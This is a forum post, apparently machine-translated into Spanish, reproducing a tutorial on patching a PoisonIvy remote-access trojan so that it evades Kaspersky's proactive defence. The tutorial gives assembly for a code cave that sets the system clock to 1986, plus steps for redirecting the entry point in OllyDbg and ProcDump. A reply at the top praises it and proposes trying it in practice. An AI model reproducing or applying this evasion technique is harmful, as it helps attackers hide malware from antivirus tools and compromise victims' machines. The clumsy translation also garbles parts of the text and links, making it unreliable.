Amigo este material esta excelente, hace mucho tiempo que estaba buscando algo parecido, este manual indica no solo como saltarse el firewall sino que también la propia defensa proactiva, esta increíble, ahora juntos pongamoslo en practica haber si da resultado, ojala podamos estar en contacto para vertus progresos y tu enterarte de los míos
03.08.2007 por Icarus
Sin pasar por Kaspersky mecanismo de defensa proactivo
Hola a todos, este es Ícaro, yo m va a mostrar que un simple truco de eludir Kaspersky s
ProActive nuevo sistema utilizando una vulnerabilidad que hace algún tiempo en libertad. Sin parche
Disponible ahora, pero sé que después de la gente usa esta técnica que se creará un parche o algo
Al igual que ..
Voy a demostrar la técnica por uno de mis favoritos PoisonIvy RAT (lo puede encontrar en
Www.chasenet.org una gran comunidad a la que deben comprobar hacia fuera)
Para ser utilizado por todos los que utilizan algunos genéricos instrucciones para que no se corrompe el servidor que está
Utilizando. Esta técnica won t hacer su servidor UD sólo añade eludir característica ProActive
A su servidor. Sin embargo otro ejemplo en el final hace que tu servidor para ambos UD
Kaspersky y desvíos ProActive. También tenga en cuenta que el núcleo duro instrucciones codificadas pueden ser
Diferentes, en algunos casos extremos, esta técnica también ganó t trabajo en ambientes emulados como
VMWare.
Usted debe estar familiarizado con algunos Ollydebugger invertir y, si no, lee tutoriales por
Sobre mí haciendo malwares UD.
Abra el servidor con Ollydebugger y desplácese hacia abajo hasta encontrar una cueva código (consulte la UD
Tutoriales Parte 1 para obtener más información acerca de código de cuevas, punto de entrada y otras cosas)
Punto de entrada es original de la nota que 00402FD9
Desplácese hacia abajo y encontrar un código cueva de manera que podamos aplicar nuestro código
Aquí es la función que vamos a aplicar:
Guardar todos los registros
Obtener la hora local
Cambio de año para 1986
Establecer hora local
Restaurar todos los registros
Jmp a punto de entrada original (00402FD9 a cabo en el ejemplo)
Este es el código para la función
PUSH ESP
PUSH EBP
PUSH EDI
PUSH ESI
PUSHAD
PUSH ESP
CONVOCATORIA 7C80A7D4
MOV DWORD PTR SS: [ESP], 807C2
PUSH EAX
CONVOCATORIA 7C855921
POPAD
POP ESI
POP EDI
POP EBP
POP ESP
JMP 00402FD9
0040348F Tenga en cuenta que es la dirección a partir de nuestra función. Vamos a utilizar esta dirección de manera más tarde
Guardarlo. También el código para la función se interpreta con ollydebugger al escribir CONVOCATORIA
7C80A7D4 se anotará como CONVOCATORIA kernel32.GetLocalTime .. ¡sorpresa!
Seleccione la función que acabamos de aplicar y guardar en el archivo (Consulte la UD Tutoriales para Part1
Nuevas instrucciones de ahorro existente en el servidor)
Tras guardar el archivo abierto Procdump y vamos a empezar a establecer la dirección de nuestro servidor a la dirección
De la primera instrucción de nuestra función (0040348F en nuestro ejemplo)
Vamos a escribir 0040348F 00400000 = 0000348F
Para saber más sobre el cálculo o la nueva edición de Entrada Pont referirse a UD Tutoriales Parte 1
Guardar y ¡todo hecho! Ahora su servidor a la ejecución va a cambiar el sistema a tiempo
1986, que inhabilita Kaspersky s y permite su licencia de Troya para ejecutar con éxito
Kaspersky s inhabilitando todas las protecciones incluidas ProActive Defensa.
Asimismo, si usted desea hacer su servidor UD Kaspersky para añadir algunos maniquí en el cálculo
Inicio de su función, aquí está la captura de pantalla de un servidor que utiliza este cálculo ficticio,
Puede usarlo en su propio servidor.
Antes de servidor inicia
Después de ejecutar el servidor
Icarus Helios Psyc
Registerer@hotmail.com O
Repsycoolez@hotmail.com Todos Tutoriales UD puede solicitarse a
http://Http://students.sabanciuniv.edu/ ~ canyildizli /
Ollydebugger puede encontrar en la
http://Http://www.ollydbg.de ProcDump puede encontrar en la
http://Http://www.fortunecity.com/millenium/firemansam/962/html/procdump.html
Suscripción al boletín mensual de elhacker.net
Autor
En línea
